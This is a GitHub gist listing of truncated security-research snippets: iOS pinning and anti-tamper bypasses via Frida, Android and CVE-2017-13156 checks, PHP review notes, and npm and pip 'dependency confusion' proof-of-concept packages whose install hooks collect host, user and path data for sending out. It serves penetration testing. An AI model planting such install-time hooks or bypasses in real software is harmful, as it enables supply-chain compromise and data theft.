Skip to content

Instantly share code, notes, and snippets.

View rodnt's full-sized avatar
🐈‍⬛
see no evil ~ learning..

rodnt (0x5244) rodnt

🐈‍⬛
see no evil ~ learning..
View GitHub Profile
@rodnt
rodnt / ios14-certificate-pinning-bypass.md
Created March 19, 2022 12:00 — forked from AkdM/ios14-certificate-pinning-bypass.md
iOS 14 app TLS decrypt / certificate pinning bypass steps

This is not a tutorial, just a small guide to myself but feel free to get some infos here.

Working on an iPhone 7 running iOS 14.5.1

  1. Jailbreak an iPhone/iPad/whatever

  2. If necessary, you'll need to bypass Jailbreak detection for some apps with tweaks like A-Bypass, Hestia, HideJB, etc.

  3. Get the PID of the app you want to capture traffic from with frida-ps -Ua ( a is for showing running apps only, you can -U to show all running processes instead)

@rodnt
rodnt / bypassAntiTamper.js
Last active August 23, 2022 13:35
Simple Bypass iOS anti-tamper ptrace,systctl,strstr,getppid
/**
* Rodolfo 'rodx00' Tavares
* twitter @0xrodnt
* github rodnt
*/
if(ObjC.available) {
const tamperLibs = [
"Substrate",
@rodnt
rodnt / npm_dependency.js
Created May 15, 2022 22:51
PoC Dependecy confusion nodejs
const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
const https = require("https");
const packageJSON = require("./package.json");
const package = packageJSON.name;
const trackingData = JSON.stringify({
p: package,
c: __dirname,
@rodnt
rodnt / pip_dependency.py
Created May 15, 2022 22:55
dependency confusion python
from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
def run(self):
install.run(self)
@rodnt
rodnt / fridaUtils.js
Last active March 3, 2023 09:52
Bytes to hex, string to bytes, bytes to string
/**
*
* Author: __rodx00__
*
* Usefull functions while reversing frida scripts.
*/
function bin2ascii(array) {
var result = [];
@rodnt
rodnt / verify_CVE-2017-13156.sh
Created June 28, 2022 22:55
bash script to verify CVE-2017-13156
#!/bin/bash
me=`basename "$0"`
echo ":: verify CVE-2017-13156 ::"
echo ":: USAGE bash $me <filename_.apk> "
command -v apksigner >/dev/null 2>&1 || { echo >&2 "apksigner not in \$PATH. Aborting."; exit 1; }
command -v apktool >/dev/null 2>&1 || { echo >&2 "apktool not in \$PATH. Aborting."; exit 1; }
file=$1
echo "verifing signatures"
@rodnt
rodnt / open_activities.py
Created June 28, 2022 23:03
python3 script to brute force activities android, open one by one.
import sys
from sys import exit
import os
import time
"""
Using objection and dumping all activities with
android hooking list activities
@rodnt
rodnt / One_Liners.md
Created August 6, 2022 17:45
One liners
@rodnt
rodnt / php_code_review_notes.md
Last active August 14, 2022 23:31
Code review PHP functions
  • Path traversal ( these functions can be used to read files )

    • functions
      • readfile()
      • file_get_contents()
      • fopen()
      • fread()
      • fgets()
  • Server Side Request Forgery ( SSRF )

@rodnt
rodnt / wordpress_plugins.py
Created September 19, 2022 13:43
Download all plugins from wordpress and save it
from shutil import ExecError
import requests
from bs4 import BeautifulSoup
import os
import wget
from concurrent.futures import ThreadPoolExecutor
import zipfile
def wordpress_plugin():
urls = []